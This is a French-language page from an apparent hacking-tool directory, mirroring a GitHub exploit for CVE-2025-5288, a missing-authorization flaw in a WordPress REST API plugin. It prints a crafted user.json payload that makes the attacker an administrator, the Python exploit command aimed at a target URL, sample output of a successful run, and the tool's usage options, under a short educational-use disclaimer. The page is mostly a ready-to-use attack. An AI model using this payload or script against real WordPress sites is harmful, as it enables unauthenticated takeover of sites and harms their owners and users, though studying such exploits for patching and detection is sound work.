Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5288 — Wordpress REST API | Générateur d'API personnalisé pour multiplateforme et import/export dans WP 1.0.0 - 2.0.3 - Absence d'autorisation menant à une élévation de privilèges non authentifiée | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-5288
Authentification et AutorisationEscalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubnxploited/cve-2025-5288

CVE-2025-5288

Wordpress REST API | Générateur d'API personnalisé pour multiplateforme et import/export dans WP 1.0.0 - 2.0.3 - Absence d'autorisation menant à une élévation de privilèges non authentifiée

Voir le dépôt
35il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚨 REST API | Générateur d'API personnalisé pour plateformes croisées et import/export dans WP 1.0.0 - 2.0.3 - Autorisation manquante conduisant à une élévation de privilèges non authentifiée

📋 Description

Le plugin WordPress REST API | Custom API Generator For Cross Platform And Import Export In WP est vulnérable à une élévation de privilèges en raison d'un contrôle de capacité manquant sur la fonction process_handler() dans les versions 1.0.0 à 2.0.3.
Cela permet à des attaquants non authentifiés d'envoyer un fichier user.json spécialement conçu à un point de terminaison exposé et de créer un nouveau compte Administrateur.

  • CVE : CVE-2025-5288
  • Score CVSS : 9.8 (Critique)
  • Publié : 12 juin 2025
  • Dernière mise à jour : 12 juin 2025

⚙️ Explication du script

Format du payload user.json :

root@kitploit:~
[
  {
    "author_data": {
      "post_author": "Nxploited",
      "post_author_email": "[email protected]",
      "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
  }
]

🚀 Déroulement de l'exploitation :

root@kitploit:~
python3 CVE-2025-5288.py -u http://192.168.100.74:888/wordpress/ -json http://192.168.100.74:888/user.json

Exemple de sortie :

root@kitploit:~
[+] Target appears vulnerable (version: 2.0.3) - exploiting...

[*] Fetching JSON payload from: http://192.168.100.74:888/user.json
[+] JSON content loaded successfully:

    [1] {
    "author_data": {
        "post_author": "Nxploited",
        "post_author_email": "[email protected]",
        "post_author_role": "administrator"
    },
    "title": "Nxploited (Khaled_alenazi)",
    "content": "Nxploited (Khaled_alenazi)"
}

[*] Launching exploitation...

[+] Exploit delivered successfully.

[+] Payload Sent:
[
    {
        "author_data": {
            "post_author": "Nxploited",
            "post_author_email": "[email protected]",
            "post_author_role": "administrator"
        },
        "title": "Nxploited (Khaled_alenazi)",
        "content": "Nxploited (Khaled_alenazi)"
    }
]

🧰 Utilisation

root@kitploit:~
usage: CVE-2025-5288.py [-h] -u URL -json URL_JSON [--proxy PROXY] [--timeout TIMEOUT] [--no-verify] [--no-sleep] [--debug]

Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of WordPress site (e.g., http://target/wp/)
  -json, --url_json URL_JSON
                        URL to hosted R.json payload
  --proxy PROXY         Proxy URL (e.g., http://127.0.0.1:8080)
  --timeout TIMEOUT     HTTP timeout in seconds (default: 10)
  --no-verify           Disable SSL certificate verification (NOT recommended!)
  --no-sleep            Disable sleep delays for faster execution
  --debug               Enable debug output
                                               

⚠️ Avertissement

Cet outil est destiné uniquement à la recherche en sécurité à des fins éducatives et autorisées. L'accès non autorisé à des systèmes sans permission est illégal.


Par : Nxploited (Khaled_alenazi)

Télécharger l’outil